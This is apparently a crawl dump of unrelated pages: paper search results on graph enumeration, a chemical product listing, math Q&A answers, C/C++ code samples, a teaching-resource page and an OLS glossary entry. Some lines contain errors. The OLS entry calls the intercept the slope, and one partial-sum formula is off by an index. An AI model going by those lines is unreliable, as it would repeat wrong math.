minimal connected  ...  In this paper we show that the maximum number of minimal connected vertex covers of a graph is O(1.8668 n ), and these can be enumerated in time O(1.8668 n ).  ...  Examples of such recent results, both on general graphs and on some graph classes, concern the enumeration and maximum number of minimal dominating sets, minimal feedback vertex sets, minimal subset feedback  ...\n\n### Enumeration and Maximum Number of Minimal Connected Vertex Covers in Graphs [article]\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch\n2016 arXiv   pre-print\nFor graphs of chordality at most 5, we are able to give a better upper bound, and for chordal graphs and distance-hereditary graphs we are able to give tight bounds on the maximum number of minimal connected  ...  In this paper we show that the maximum number of minimal connected vertex covers of a graph is at most 1.8668^n, and these can be enumerated in time O(1.8668^n).  ...  
Examples of such recent results, both on general graphs and on some graph classes, concern the enumeration and maximum number of minimal dominating sets, minimal feedback vertex sets, minimal subset feedback  ...\n\n### Subset feedback vertex sets in chordal graphs\n\nPetr A. Golovach, Pinar Heggernes, Dieter Kratsch, Reza Saei\n2014 Journal of Discrete Algorithms\nWe give an algorithm with running time O(1.6708 n ) that enumerates all minimal subset feedback vertex sets on chordal graphs on n vertices.  ...  We also obtain that a chordal graph G has at most 1.6708 n minimal subset feedback vertex sets, regardless of S .  ...  More recently, the maximum numbers and enumeration of objects like minimal dominating sets, minimal feedback vertex sets, minimal subset feedback vertex sets, minimal separators, and potential maximal  ...\n\n### On the Neighbourhood Helly of Some Graph Classes and Applications to the Enumeration of Minimal Dominating Sets [chapter]\n\nMamadou Moustapha Kanté, Vincent Limouzy, Arnaud Mary, Lhouari Nourine\n2012 Lecture Notes in Computer Science\nAs a consequence, we obtain output-polynomial time algorithms for enumerating the set of minimal dominating sets of line graphs and path graphs.  ...  Therefore, there exists an output-polynomial time algorithm that enumerates the set of minimal edge-dominating sets of any graph.  ...  We denote by D(G) the set of (inclusionwise) minimal dominating sets of a graph G.  ...\n\n### On Distance-d Independent Set and other problems in graphs with few minimal separators [article]\n\nPedro Montealegre, Ioan Todinca\n2016 arXiv   pre-print\nWe also provide polynomial algorithms for Connected Vertex Cover and Connected Feedback Vertex Set on subclasses of including chordal and circular-arc graphs, and we discuss variants of independent domination  ...  Fomin and Villanger (STACS 2010) proved that Maximum Independent Set, Feedback Vertex Set, and more generally the problem of finding a maximum induced subgraph of treewith at most a constant t, can be  ...  We thank Iyad Kanj for fruitful discussions on the subject.  ...\n\n### Counting the number of independent sets in chordal graphs\n\nYoshio Okamoto, Takeaki Uno, Ryuhei Uehara\n2008 Journal of Discrete Algorithms\nWe study some counting and enumeration problems for chordal graphs, especially concerning independent sets.  ...  With similar ideas, we show that enumeration (namely, listing) of the independent sets, the maximum independent sets, and the independent sets of a fixed size in a chordal graph can be done in constant  ...  Acknowledgement The authors thank Masashi Kiyomi for enlightening discussions and pointing out the work by Chang . The authors are grateful to L. Shankar Ram for pointing out a paper .  ...\n\n### Weighted domination of independent sets [article]\n\nRon Aharoni, Irina Gorelik\n2017 arXiv   pre-print\nThe independent domination number γ^i(G) of a graph G is the maximum, over all independent sets I, of the minimal number of vertices needed to dominate I.  ...  It is known abz that in chordal graphs γ^i is equal to γ, the ordinary domination number.  ...  We say that f is w-dominating if it w-dominates V . The independent domination number γ i w (G) is the maximum over all independent sets I of the minimal size of an integral function w-dominating I.  ...\n« Previous Showing results 1 — 15 out of 512 results" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8282111,"math_prob":0.96017027,"size":10148,"snap":"2022-40-2023-06","text_gpt3_token_len":2459,"char_repetition_ratio":0.2121451,"word_repetition_ratio":0.31411532,"special_character_ratio":0.23541585,"punctuation_ratio":0.15896104,"nsfw_num_words":5,"has_unicode_error":false,"math_prob_llama3":0.9751792,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-03T09:39:23Z\",\"WARC-Record-ID\":\"<urn:uuid:e2094408-e142-436b-a203-069697c7b746>\",\"Content-Length\":\"121074\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eed705e4-aca5-4cdb-a3f0-73ff3a781268>\",\"WARC-Concurrent-To\":\"<urn:uuid:063dd4d8-cefa-4fdf-940b-60a02d91920b>\",\"WARC-IP-Address\":\"207.241.225.9\",\"WARC-Target-URI\":\"https://scholar.archive.org/search?q=Enumeration+and+maximum+number+of+minimal+dominating+sets+for+chordal+graphs.\",\"WARC-Payload-Digest\":\"sha1:Y3D4E4M7RCKPPZWU2VEJTBI2XESYIXTK\",\"WARC-Block-Digest\":\"sha1:6NSOCES3YLHDTHWRVMTAF3TBPKSLUV7P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337404.30_warc_CC-MAIN-20221003070342-20221003100342-00729.warc.gz\"}"}
https://www.targetmol.com/compound/Indophagolin
[ "# Indophagolin\n\nCatalog No. T8946   CAS 1207660-00-1\n\nIndophagolin is a potent, indoline-containing autophagy inhibitor with IC50 of 140 nM. Indophagolin antagonizes the purinergic receptor P2X4 as well as P2X1 and P2X3 with IC50s of 2.71, 2.40 and 3.49 μM, respectively.\n\nAll products from TargetMol are for Research Use Only. Not for Human or Veterinary or Therapeutic Use.", null, "Indophagolin, CAS 1207660-00-1\nProduct consultation\nGet quote\nPurity: 98%\nBiological Description\nChemical Properties\nStorage & Solubility Information\n Description Indophagolin is a potent, indoline-containing autophagy inhibitor with IC50 of 140 nM. Indophagolin antagonizes the purinergic receptor P2X4 as well as P2X1 and P2X3 with IC50s of 2.71, 2.40 and 3.49 μM, respectively. Targets&IC50 P2X1:2.40μM , P2X3:3.49 μM , P2X4:2.71μM In vitro Indophagolin (10 μM) inhibits autophagosome formation in MCF7 cells.Indophagolin also antagonizes the Gq-protein-coupled P2Y4, P2Y6, and P2Y11 receptors (IC50s =3.4~15.4 μM). Indophagolin has a strong antagonistic effect on serotonin receptor 5-HT6 (IC50=1.0 μM) and a moderate effect on receptors 5-HT1B, 5-HT2B, 5-HT4e, and 5-HT7.\n Molecular Weight 523.75 Formula C19H15BrClF3N2O3S CAS No. 1207660-00-1\n\n#### Storage\n\nPowder: -20°C for 3 years\n\nIn solvent: -80°C for 2 years\n\n#### Solubility Information\n\nDMSO: 10 mM\n\n( < 1 mg/ml refers to the product slightly soluble or insoluble )\n\n## Related compound libraries\n\nThis product is contained In the following compound libraries:\n\n## Related Products\n\nRelated compounds with same targets\n\n##", null, "Dose Conversion\n\nYou can also refer to dose conversion for different animals. More\n\n##", null, "In vivo Formulation Calculator (Clear solution)\n\nStep One: Enter information below\nDosage\nmg/kg\nAverage weight of animals\ng\nDosing volume per animal\nul\nNumber of animals\nStep Two: Enter the in vivo formulation\n% DMSO\n%\n% Tween 80\n% ddH2O\n\n##", null, "Calculator\n\nMolarity Calculator\nDilution Calculator\nReconstitution Calculation\nMolecular Weight Calculator\n=\nX\nX\n\n### Molarity Calculator allows you to calculate the\n\n• Mass of a compound required to prepare a solution of known volume and concentration\n• Volume of solution required to dissolve a compound of known mass to a desired concentration\n• Concentration of a solution resulting from a known mass of compound in a specific volume\nSee Example\n\nAn example of a molarity calculation using the molarity calculator\nWhat is the mass of compound required to make a 10 mM stock solution in 10 ml of water given that the molecular weight of the compound is 197.13 g/mol?\nEnter 197.13 into the Molecular Weight (MW) box\nEnter 10 into the Concentration box and select the correct unit (millimolar)\nEnter 10 into the Volume box and select the correct unit (milliliter)\nPress calculate\nThe answer of 19.713 mg appears in the Mass box\n\nX\n=\nX\n\n### Calculator the dilution required to prepare a stock solution\n\nCalculate the dilution required to prepare a stock solution\nThe dilution calculator is a useful tool which allows you to calculate how to dilute a stock solution of known concentration. 
Enter C1, C2 & V2 to calculate V1.\n\nSee Example\n\nAn example of a dilution calculation using the Tocris dilution calculator\nWhat volume of a given 10 mM stock solution is required to make 20ml of a 50 μM solution?\nUsing the equation C1V1 = C2V2, where C1=10 mM, C2=50 μM, V2=20 ml and V1 is the unknown:\nEnter 10 into the Concentration (start) box and select the correct unit (millimolar)\nEnter 50 into the Concentration (final) box and select the correct unit (micromolar)\nEnter 20 into the Volume (final) box and select the correct unit (milliliter)\nPress calculate\nThe answer of 100 microliter (0.1 ml) appears in the Volume (start) box\n\n=\n/\n\n### Calculate the volume of solvent required to reconstitute your vial.\n\nThe reconstitution calculator allows you to quickly calculate the volume of a reagent to reconstitute your vial.\nSimply enter the mass of reagent and the target concentration and the calculator will determine the rest.\n\ng/mol\n\n### Enter the chemical formula of a compound to calculate its molar mass and elemental composition\n\nTip: Chemical formula is case sensitive: C10H16N2O2 c10h16n2o2\n\nInstructions to calculate molar mass (molecular weight) of a chemical compound:\nTo calculate molar mass of a chemical compound, please enter its chemical formula and click 'Calculate'.\nDefinitions of molecular mass, molecular weight, molar mass and molar weight:\nMolecular mass (molecular weight) is the mass of one molecule of a substance and is expressed n the unified atomic mass units (u). (1 u is equal to 1/12 the mass of one atom of carbon-12)\nMolar mass (molar weight) is the mass of one mole of a substance and is expressed in g/mol.\n\nbottom\n\n## Tech Support\n\nPlease see Inhibitor Handling Instructions for more frequently ask questions. Topics include: how to prepare stock solutions, how to store products, and cautions on cell-based assays & animal experiments, etc." ]
[ null, "https://www.targetmol.cn/file/group1/M00/cassfile/1207660-00-1.png", null, "https://www.targetmol.com/images/icons2/calculator.svg", null, "https://www.targetmol.com/images/icons2/calculator.svg", null, "https://www.targetmol.com/images/icons2/calculator.svg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7763908,"math_prob":0.92827445,"size":1637,"snap":"2023-14-2023-23","text_gpt3_token_len":578,"char_repetition_ratio":0.13288426,"word_repetition_ratio":0.3043478,"special_character_ratio":0.29260844,"punctuation_ratio":0.153125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9598929,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-05T16:39:52Z\",\"WARC-Record-ID\":\"<urn:uuid:e3da06ed-f3bd-455f-9192-ac3a323a265c>\",\"Content-Length\":\"117841\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6a53bd99-7462-4a65-b91d-00b4439bd805>\",\"WARC-Concurrent-To\":\"<urn:uuid:7a908866-62c1-4a7c-8a48-fdc79415e9fb>\",\"WARC-IP-Address\":\"128.14.246.10\",\"WARC-Target-URI\":\"https://www.targetmol.com/compound/Indophagolin\",\"WARC-Payload-Digest\":\"sha1:N6UOT33NCRDNNDYR5UN6EGXSQA5NMPMN\",\"WARC-Block-Digest\":\"sha1:D5CYCQLLNI5CIVFTI5KRH63KY7QHC4XY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224652149.61_warc_CC-MAIN-20230605153700-20230605183700-00298.warc.gz\"}"}
https://socratic.org/questions/how-do-you-find-the-nth-partial-sum-determine-whether-the-series-converges-and-f-2
[ "# How do you find the nth partial sum, determine whether the series converges and find the sum when it exists given 1+3/4+9/16+...+(3/4)^n+...?\n\nJun 8, 2018\n\n${\\sum}_{k = 0}^{n} {\\left(\\frac{3}{4}\\right)}^{k} = 4 - 3 {\\left(\\frac{3}{4}\\right)}^{n - 1}$\n\n${\\sum}_{k = 0}^{\\infty} {\\left(\\frac{3}{4}\\right)}^{k} = 4$\n\n#### Explanation:\n\nThis is a geometric series of ratio $q = \\frac{3}{4}$.\n\nConsider the series:\n\n${\\sum}_{k = 0}^{\\infty} {q}^{k}$\n\nand its partial sum:\n\n${s}_{n} = {\\sum}_{k = 0}^{n} {q}^{k} = 1 + q + {q}^{2} + \\ldots + {q}^{n} = \\frac{{q}^{n + 1} - 1}{q - 1}$\n\nThen, if $\\left\\mid q \\right\\mid < 1$:\n\n${\\lim}_{n \\to \\infty} {s}_{n} = {\\lim}_{n \\to \\infty} \\frac{{q}^{n + 1} - 1}{q - 1} = \\frac{1}{1 - q}$\n\nFor $q = \\frac{3}{4}$:\n\n${s}_{n} = \\frac{{\\left(\\frac{3}{4}\\right)}^{n} - 1}{\\frac{3}{4} - 1} = \\frac{{3}^{n} - {4}^{n}}{{4}^{n} \\left(- \\frac{1}{4}\\right)} = \\frac{{4}^{n} - {3}^{n}}{4} ^ \\left(n - 1\\right) = 4 - 3 {\\left(\\frac{3}{4}\\right)}^{n - 1}$\n\nand:\n\n${\\sum}_{k = 0}^{\\infty} {\\left(\\frac{3}{4}\\right)}^{k} = 4$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6513842,"math_prob":1.00001,"size":400,"snap":"2021-43-2021-49","text_gpt3_token_len":108,"char_repetition_ratio":0.11363637,"word_repetition_ratio":0.0,"special_character_ratio":0.2725,"punctuation_ratio":0.16091955,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000094,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-01T12:27:23Z\",\"WARC-Record-ID\":\"<urn:uuid:f2463b13-03d2-4b9c-b9e1-ffe1ba6babf4>\",\"Content-Length\":\"34364\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f1e56f65-b7d5-4078-8b32-59a0a3d6c85f>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ca7cc81-b484-4545-a155-4a33f07e29fb>\",\"WARC-IP-Address\":\"216.239.32.21\",\"WARC-Target-URI\":\"https://socratic.org/questions/how-do-you-find-the-nth-partial-sum-determine-whether-the-series-converges-and-f-2\",\"WARC-Payload-Digest\":\"sha1:2VAZIENYFDADPGCKRXZVDUETER4CS4P6\",\"WARC-Block-Digest\":\"sha1:OYQYLM7SXQVKYWHDSCTHTCK2T3UZY3AE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964360803.0_warc_CC-MAIN-20211201113241-20211201143241-00413.warc.gz\"}"}
https://discuss.codechef.com/t/elements-of-lcs/10348
[ "", null, "# ELEMENTS OF LCS\n\nI have recently learnt how to find the length of the longest common subsequence of two strings, but cannot understand how can I print the elements of the LCS. For example, if the strings are “AASDGX” and “AAWD”, then the output will be “AAD” Please help!\n\n#include\n#include\n#include\nusing namespace std;\n\n``````/* Returns length of LCS for X[0..m-1], Y[0..n-1] */\nvoid lcs( char *X, char *Y, int m, int n )\n{\nint L[m+1][n+1];\n\n/* Following steps build L[m+1][n+1] in bottom up fashion. Note\nthat L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1] */\nfor (int i=0; i<=m; i++)\n{\nfor (int j=0; j<=n; j++)\n{\nif (i == 0 || j == 0)\nL[i][j] = 0;\nelse if (X[i-1] == Y[j-1])\nL[i][j] = L[i-1][j-1] + 1;\nelse\nL[i][j] = max(L[i-1][j], L[i][j-1]);\n}\n}\n\n// Following code is used to print LCS\nint index = L[m][n];\n\n// Create a character array to store the lcs string\nchar lcs[index+1];\nlcs[index] = '\\0'; // Set the terminating character\n\n// Start from the right-most-bottom-most corner and\n// one by one store characters in lcs[]\nint i = m, j = n;\nwhile (i > 0 && j > 0)\n{\n// If current character in X[] and Y are same, then\n// current character is part of LCS\nif (X[i-1] == Y[j-1])\n{\nlcs[index-1] = X[i-1]; // Put current character in result\ni--; j--; index--; // reduce values of i, j and index\n}\n\n// If not same, then find the larger of two and\n// go in the direction of larger value\nelse if (L[i-1][j] > L[i][j-1])\ni--;\nelse\nj--;\n}\n\n// Print the lcs\ncout << \"LCS of \" << X << \" and \" << Y << \" is \" << lcs;\n}\n\nint main()\n{\nchar X[] = \"AASDGX\";\nchar Y[] = \"AAWD\";\n\nint m = strlen(X);\nint n = strlen(Y);\n\nlcs(X, Y, m, n);\n\nreturn 0;\n}\n``````\n\n@anupam_datta welcome", null, "" ]
[ null, "https://s3.amazonaws.com/discourseproduction/original/3X/7/f/7ffd6e5e45912aba9f6a1a33447d6baae049de81.svg", null, "https://discuss.codechef.com/images/emoji/apple/slight_smile.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74997973,"math_prob":0.99241066,"size":1699,"snap":"2020-34-2020-40","text_gpt3_token_len":593,"char_repetition_ratio":0.09852508,"word_repetition_ratio":0.0,"special_character_ratio":0.40317833,"punctuation_ratio":0.13681592,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9983371,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-23T03:07:22Z\",\"WARC-Record-ID\":\"<urn:uuid:e6102e41-28de-445d-bb67-92fca130c6d7>\",\"Content-Length\":\"21164\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d25fac83-0e0d-4f1a-8317-b8a8477120f4>\",\"WARC-Concurrent-To\":\"<urn:uuid:ae3d80d4-2ea8-4100-8834-d70fa1be9cf9>\",\"WARC-IP-Address\":\"52.54.40.124\",\"WARC-Target-URI\":\"https://discuss.codechef.com/t/elements-of-lcs/10348\",\"WARC-Payload-Digest\":\"sha1:XJQCJA3WVSZYD56OJPKKAMCJAKWAWBX4\",\"WARC-Block-Digest\":\"sha1:QVRD2AKFMMKJBF7ACSOVSKWYMOGK3G22\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400209665.4_warc_CC-MAIN-20200923015227-20200923045227-00703.warc.gz\"}"}
https://www.nba-india.org/2023/04/01/c-program-to-swap-two-numbers-using-pointer/
[ "# C Program to Swap Two Numbers using Pointer\n\nIn this tutorial, i am going to show you how to swap two numbers with the help of pointer in c program.\n\n## C Program to Swap Two Numbers using Pointer\n\n```#include <stdio.h>\nvoid swapTwo(int *x, int *y)\n{\nint temp;\ntemp = *x;\n*x = *y;\n*y = temp;\n}\nint main()\n{\nint num1, num2;\nprintf(\"Please Enter the First Value to Swap = \");\nscanf(\"%d\", &num1);\nprintf(\"Please Enter the Second Value to Swap = \");\nscanf(\"%d\", &num2);\nprintf(\"\\nBefore Swapping: num1 = %d num2 = %d\\n\", num1, num2);\n\nswapTwo(&num1, &num2);\nprintf(\"After Swapping : num1 = %d num2 = %d\\n\", num1, num2);\n}```\n\nThe result of the above c program; is as follows:\n\n```Please Enter the First Value to Swap = 5\nPlease Enter the Second Value to Swap = 6\nBefore Swapping: num1 = 5 num2 = 6\nAfter Swapping : num1 = 6 num2 = 5```\n\nCategories C" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.61252415,"math_prob":0.99919695,"size":766,"snap":"2023-14-2023-23","text_gpt3_token_len":239,"char_repetition_ratio":0.13517061,"word_repetition_ratio":0.16783217,"special_character_ratio":0.3537859,"punctuation_ratio":0.18181819,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9871882,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-05T07:13:37Z\",\"WARC-Record-ID\":\"<urn:uuid:86881a4b-98e7-488f-b6e4-4981718ee0d2>\",\"Content-Length\":\"49374\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:31f98946-1058-45ff-a519-036a2108381a>\",\"WARC-Concurrent-To\":\"<urn:uuid:2d19698a-5dc3-4097-8447-1522fc05abef>\",\"WARC-IP-Address\":\"104.21.80.19\",\"WARC-Target-URI\":\"https://www.nba-india.org/2023/04/01/c-program-to-swap-two-numbers-using-pointer/\",\"WARC-Payload-Digest\":\"sha1:IXKT6GQXN4OFXRNQC6QPLCAVF7VZQZG4\",\"WARC-Block-Digest\":\"sha1:7GGKJTMM5HFTSO4B5CFKBN2VIR64R34D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224651325.38_warc_CC-MAIN-20230605053432-20230605083432-00484.warc.gz\"}"}
https://www.physicsforums.com/threads/nested-square-roots-limit.285577/
# Nested square roots limit\n\n## Homework Statement", null, "## The Attempt at a Solution\n\nDick\nHomework Helper\n\nIt's more awkward to write than hard.\nsqrt(x+sqrt(x))=sqrt(x)*sqrt(1+1/sqrt(x)). Now pull a sqrt(x) out of the outer sqrt so you've got sqrt(x+sqrt(x+sqrt(x)))=sqrt(x)*sqrt(1+(1/sqrt(x))*sqrt(1+1/sqrt(x))). The denominator is sqrt(x)*sqrt(1+1/x). Now cancel the sqrt(x) on the outside and take the limit. If you can read that I congratulate you. I THINK I got it right.\n\nThe answer is 1... but how did you come up with the equivalent equation for the numerator? :(\n\nDefennder\nHomework Helper\n\nIt's probably advisable not to use L'Hospital because of the nested square roots. Instead, follow what Dick said (I'm hoping I did it the same way he did because I didn't read his post in detail) and start by pulling out all the square roots by making sure that the denominator and numerator share the same square root over the entire expression.\n\nThen apply that technique inside the nested root. It'll all simplify to something whose limit you can evaluate.\n\nDick\nHomework Helper\n\nRight. l'Hopital gets messy. But you can write both numerator and denominator as sqrt(x) times something that goes to 1 as x->infinity. Just factor them both as sqrt(x)*something.\n\nl'Hopital gets messy indeed. But, hey, at least it's honest. :tongue2:\n\nDick
[ null, "data:image/svg+xml;charset=utf-8,%3Csvg xmlns%3D'http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg' width='226' height='114' viewBox%3D'0 0 226 114'%2F%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9499366,"math_prob":0.9220074,"size":897,"snap":"2020-34-2020-40","text_gpt3_token_len":210,"char_repetition_ratio":0.09854423,"word_repetition_ratio":0.0,"special_character_ratio":0.22408026,"punctuation_ratio":0.108571425,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9931256,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-15T05:36:21Z\",\"WARC-Record-ID\":\"<urn:uuid:624f4d77-9534-4272-97d3-6a68bac6d3df>\",\"Content-Length\":\"86557\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3d914051-5f8c-4f96-922c-d67733b65612>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb923b88-099a-4411-86ad-7bf28dacf7d2>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/nested-square-roots-limit.285577/\",\"WARC-Payload-Digest\":\"sha1:B3RT7ZQIFROEB4BWG347PFQDG3M7VONG\",\"WARC-Block-Digest\":\"sha1:QZNXJBER654IPK5AKRT2OOUJWFTPEIEH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439740679.96_warc_CC-MAIN-20200815035250-20200815065250-00536.warc.gz\"}"}
https://www.teachstarter.com/us/teaching-resource/math-warm-ups-interactive-powerpoint-grade-2/
[ "# Math Warm-Ups Interactive PowerPoint - Grade 2\n\n0\n3\nPDF, PowerPoint | 23 pages|Grade: 2\n\nA PowerPoint providing a series of warm-up activities for Grade 2 students across the mathematics curriculum.\n\nThis teaching resource is an interactive PowerPoint which provides a series of mathematical warm-up activities that cover areas across the curriculum. You can do these quick activities to help warm up for a particular focus lesson, or use them to break up the day to keep students fresh for learning. Some activities supply instructions for interactive games and other are interactive templates which you can display on your classroom whiteboard with a projector.\n\nSpecific topics include:\n\n#### Common Core Curriculum alignment\n\n• CCSS.MATH.CONTENT.2.G.A.2\n\nPartition a rectangle into rows and columns of same-size squares and count to find the total number of them.\n\n• CCSS.MATH.CONTENT.2.G.A.3\n\nPartition circles and rectangles into two, three, or four equal shares, describe the shares using the words halves, thirds, half of, a third of, etc., and describe the whole as two halves, three thirds, four fourths. Recognize that equal shares of id...\n\n• CCSS.MATH.CONTENT.2.MD.A.1\n\nMeasure the length of an object by selecting and using appropriate tools such as rulers, yardsticks, meter sticks, and measuring tapes.\n\n• CCSS.MATH.CONTENT.2.MD.A.2\n\nMeasure the length of an object twice, using length units of different lengths for the two measurements; describe how the two measurements relate to the size of the unit chosen.\n\n• CCSS.MATH.CONTENT.2.MD.B.6\n\nRepresent whole numbers as lengths from 0 on a number line diagram with equally spaced points corresponding to the numbers 0, 1, 2, ..., and represent whole-number sums and differences within 100 on a number line diagram.\n\n• CCSS.MATH.CONTENT.2.MD.C.7\n\nTell and write time from analog and digital clocks to the nearest five minutes, using a.m. and p.m.\n\n• CCSS.MATH.CONTENT.2.MD.C.8\n\nSolve word problems involving dollar bills, quarters, dimes, nickels, and pennies, using \\$ and ¢ symbols appropriately. Example: If you have 2 dimes and 3 pennies, how many cents do you have?\n\n• CCSS.MATH.CONTENT.2.MD.D.10\n\nDraw a picture graph and a bar graph (with single-unit scale) to represent a data set with up to four categories. Solve simple put-together, take-apart, and compare problems1 using information presented in a bar graph.\n\n• CCSS.MATH.CONTENT.2.NBT.A.1\n\nUnderstand that the three digits of a three-digit number represent amounts of hundreds, tens, and ones; e.g., 706 equals 7 hundreds, 0 tens, and 6 ones. 
Understand the following as special cases:\n\n• CCSS.MATH.CONTENT.2.NBT.A.2\n\nCount within 1000; skip-count by 5s, 10s, and 100s.\n\n• CCSS.MATH.CONTENT.2.NBT.B.5\n\nFluently add and subtract within 100 using strategies based on place value, properties of operations, and/or the relationship between addition and subtraction.\n\n• CCSS.MATH.CONTENT.2.NBT.B.6\n\nAdd up to four two-digit numbers using strategies based on place value and properties of operations.\n\n• CCSS.MATH.CONTENT.2.OA.C.3\n\nDetermine whether a group of objects (up to 20) has an odd or even number of members, e.g., by pairing objects or counting them by 2s; write an equation to express an even number as a sum of two equal addends.\n\n• CCSS.MATH.CONTENT.2.OA.C.4\n\nUse addition to find the total number of objects arranged in rectangular arrays with up to 5 rows and up to 5 columns; write an equation to express the total as a sum of equal addends.", null, "" ]
[ null, "https://www.teachstarter.com/wp-content/uploads/2020/01/TS_logo_3000px-150x150.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85905766,"math_prob":0.89759445,"size":4814,"snap":"2021-31-2021-39","text_gpt3_token_len":1095,"char_repetition_ratio":0.121829525,"word_repetition_ratio":0.022824537,"special_character_ratio":0.20814292,"punctuation_ratio":0.18969072,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9801417,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-23T21:56:27Z\",\"WARC-Record-ID\":\"<urn:uuid:9ce998ed-02da-4dc1-b2d0-9af64f6e196a>\",\"Content-Length\":\"242109\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:97b718e2-a01a-4ec1-a70d-5bfe6c95a191>\",\"WARC-Concurrent-To\":\"<urn:uuid:f7cb34a9-fd1c-40a1-a00a-f49bb3b4aa7b>\",\"WARC-IP-Address\":\"104.22.26.76\",\"WARC-Target-URI\":\"https://www.teachstarter.com/us/teaching-resource/math-warm-ups-interactive-powerpoint-grade-2/\",\"WARC-Payload-Digest\":\"sha1:GJ4PXD5VU4FLI44OPSFIUY3DQ3GFVXMB\",\"WARC-Block-Digest\":\"sha1:PYIWV57LYLOVPSLVDT77LYKF6A3GV6N6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046150067.51_warc_CC-MAIN-20210723210216-20210724000216-00027.warc.gz\"}"}
https://deepai.org/machine-learning-glossary-and-terms/ordinary-least-squares
[ "", null, "", null, "# Ordinary Least Squares\n\n## What is Ordinary Least Squares?\n\nOrdinary Least Squares is a form of statistical regression used as a way to predict unknown values from an existing set of data. An example of a scenario in which one may use Ordinary Least Squares, or OLS, is in predicting shoe size from a data set that includes height and shoe size. Given the data, one can use the ordinary least squares formula to create a rate of change and predict shoe size, given a subject's height. In short, OLS takes an input, the independent variable, and produces an output, the dependent variable.\n\n## How does Ordinary Least Squares work?\n\nOrdinary Least Squares works by taking the input, an independent variable, and combines it with other variables known as betas through addition and multiplication. The first beta is known simply as \"beta_1\" and is used to calculate the slope of the function. In essence, it tells you what the output would be if the input was zero. The second beta is called \"beta_2\" and represents the coefficient, or how much of a difference there is between increments in the independent variable.\n\nSource\n\nTo find the betas, OLS uses the errors, the vertical distance between a data point and a regression line, to calculate the best slope for the data. The image above exemplifies the concept of determining the squares of the errors to find the regression line. OLS squares the errors and finds the line that goes through the sample data to find the smallest value for the sum of all of the squared errors.\n\n### Ordinary Least Squares and Machine Learning\n\nAs ordinary least squares is a form of regression, used to inform predictions about sample data, it is widely used in machine learning. Using the example mentioned above, a machine learning algorithm can process and analyze specific sample data that includes information on both height and shoe size. Given the the data points, and using ordinary least squares, the algorithm can begin to make predictions about an individual's shoe size given their height and given the sample data." ]
[ null, "https://deepai.org/static/images/logo.png", null, "https://deepai.org/static/images/glossary-icon.png", null ]
